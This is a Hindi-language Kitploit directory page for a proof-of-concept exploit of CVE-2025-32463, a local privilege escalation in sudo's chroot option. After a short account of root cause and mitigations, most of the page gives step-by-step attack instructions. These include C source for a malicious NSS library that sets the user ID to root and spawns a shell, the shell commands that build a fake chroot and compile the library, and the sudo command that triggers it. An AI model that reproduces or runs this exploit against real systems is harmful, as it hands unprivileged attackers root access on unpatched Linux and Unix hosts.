Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463-EXPLOIT — CVE-2025-32463 के लिए एक PoC एक्सप्लॉइट - Sudo विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/k3ystr0k3r/cve-2025-32463-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणशेलकोडपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषण
GitHubk3ystr0k3r/cve-2025-32463-exploit

CVE-2025-32463-EXPLOIT

CVE-2025-32463 के लिए एक PoC एक्सप्लॉइट - Sudo विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
921 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32463 - Sudo विशेषाधिकार वृद्धि

sudo में एक विशेषाधिकार वृद्धि कमजोरी मौजूद है जो Linux/Unix-आधारित सिस्टम को प्रभावित करती है। यह दोष अनुचित पथ सत्यापन के कारण उत्पन्न होता है जब sudo का उपयोग -R (--chroot) विकल्प के साथ किया जाता है, जिससे हमलावर दुर्भावनापूर्ण NSS लाइब्रेरी लोडिंग के माध्यम से रूट तक बढ़ सकते हैं।

मूल कारण

  • जब sudo chroot वातावरण (-R विकल्प) के अंदर एक कमांड निष्पादित करता है, तो यह त्रुटि स्थितियों के दौरान NSS (Name Service Switch) लाइब्रेरी लोडिंग को गलत तरीके से संभालता है।
  • अनुचित पथ सत्यापन (उदाहरण के लिए, LD_LIBRARY_PATH या /etc/nsswitch.conf में पथों को स्वच्छ करने में विफलता) वैध NSS लाइब्रेरी (जैसे, libnss_files.so) के बजाय एक दुर्भावनापूर्ण लाइब्रेरी लोड करने का कारण बन सकता है।
  • इसके परिणामस्वरूप रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादन होता है।

प्रभाव

  • स्थानीय पहुंच वाले हमलावर इसका शोषण करके रूट विशेषाधिकार प्राप्त कर सकते हैं।

शमन

  1. sudo को नवीनतम पैच किए गए संस्करण में अपडेट करें।
  2. sudo अनुमतियों को प्रतिबंधित करें (जहां संभव हो chroot उपयोग को सीमित करें)।
  3. पर्यावरण चरों का ऑडिट करें:
    • LD_LIBRARY_PATH को प्रतिबंधित करें।
    • /etc/nsswitch.conf को सुरक्षित करें।
  4. /etc/sudoers में secure_path लागू करें ताकि लाइब्रेरी खोज पथों को सीमित किया जा सके।

तकनीकी विवरण

घटककमजोरी ट्रिगर
sudo -Rगलत chroot पथ सत्यापन।
NSSत्रुटियों के दौरान असुरक्षित लाइब्रेरी लोडिंग।
शोषणपथ अपहरण → दुर्भावनापूर्ण लाइब्रेरी लोड।

कमजोरी का अवलोकन

CVE ID: CVE-2025-32463
प्रभावित संस्करण: Sudo 1.9.14 से 1.9.17 तक
CVSS स्कोर: 9.8 (गंभीर)
प्रभाव: स्थानीय विशेषाधिकार वृद्धि से रूट

हमले का प्रवाह

  1. हमलावर दुर्भावनापूर्ण NSS लाइब्रेरी बनाता है
  2. नकली chroot वातावरण स्थापित करता है
  3. sudo त्रुटि स्थिति को ट्रिगर करता है
  4. sudo हमलावर-नियंत्रित लाइब्रेरी लोड करता है
  5. दुर्भावनापूर्ण कोड रूट विशेषाधिकारों के साथ निष्पादित होता है

शोषण चरण

चरण 1: कमजोरी सत्यापित करें

यदि यह No such file or directory के साथ प्रतिक्रिया करता है तो यह कमजोर है: sudo -R invalid invalid sudo: invalid: No such file or directory

चरण 2: अस्थायी कार्यक्षेत्र बनाएं

सबसे पहले, हम काम करने के लिए एक अस्थायी निर्देशिका बनाते हैं: TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX) cd $TMP_DIR यह एक अद्वितीय नाम वाली अस्थायी निर्देशिका बनाता है और उसमें नेविगेट करता है। mktemp कमांड सुनिश्चित करता है कि हम मौजूदा सिस्टम फ़ाइलों में हस्तक्षेप न करें।

चरण 3: दुर्भावनापूर्ण लाइब्रेरी बनाएं

हमें एक C फ़ाइल (bridge90.c) बनाने की आवश्यकता है जिसे एक दुर्भावनापूर्ण लाइब्रेरी में संकलित किया जाएगा:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // Set real and effective user ID to root
  setregid(0,0);  // Set real and effective group ID to root
  chdir("/");     // Change to root directory
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // Execute shell
}

मुख्य घटक:

root@kitploit:~
`__attribute__((constructor))` सुनिश्चित करता है कि लाइब्रेरी लोड होने पर फ़ंक्शन चले।

`setreuid` और `setregid` विशेषाधिकारों को रूट तक बढ़ाते हैं।

`execl` एक bash शेल चलाता है।

चरण 4: शोषण वातावरण सेटअप करें

mkdir -p bridge/etc echo "passwd: /bridge90" > bridge/etc/nsswitch.conf cp /etc/group bridge/etc/ mkdir libnss_ gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c व्याख्या:

root@kitploit:~
bridge/etc में एक नकली chroot वातावरण बनाएं

हमारे दुर्भावनापूर्ण पथ को इंगित करने के लिए nsswitch.conf को संशोधित करें

वैधता बनाए रखने के लिए वास्तविक /etc/group फ़ाइल की प्रतिलिपि बनाएं

हमारी दुर्भावनापूर्ण लाइब्रेरी के लिए एक निर्देशिका बनाएं

C कोड को NSS (Name Service Switch) सम्मेलनों से मेल खाने वाले नाम वाली साझा लाइब्रेरी में संकलित करें

चरण 5: शोषण निष्पादित करें

sudo -R bridge bridge

यह कमांड हमारे तैयार किए गए वातावरण का उपयोग करने का प्रयास करता है:

root@kitploit:~
पहला bridge हमारे दुर्भावनापूर्ण कॉन्फ़िगरेशन वाली chroot निर्देशिका है

दूसरा bridge चलाने का कमांड है (जो हमारी लाइब्रेरी लोड करेगा)

चरण 6: विशेषाधिकार वृद्धि सत्यापित करें

सफल शोषण के बाद, रूट पहुंच सत्यापित करें:

whoami # Should return "root" id -u # Should return "0" (root's UID)

root@kitploit:~
graph LR
    A[Malicious Library] --> B[Fake Chroot]
    B --> C[Trigger Error]
    C --> D[Library Load]
    D --> E[Root Execution]

अस्वीकरण

यह PoC शोषण केवल शैक्षिक उद्देश्यों के लिए है! इस शोषण से आप जो भी दुरुपयोग कर सकते हैं, उसके लिए मैं जिम्मेदार नहीं हूँ!

टूल डाउनलोड करें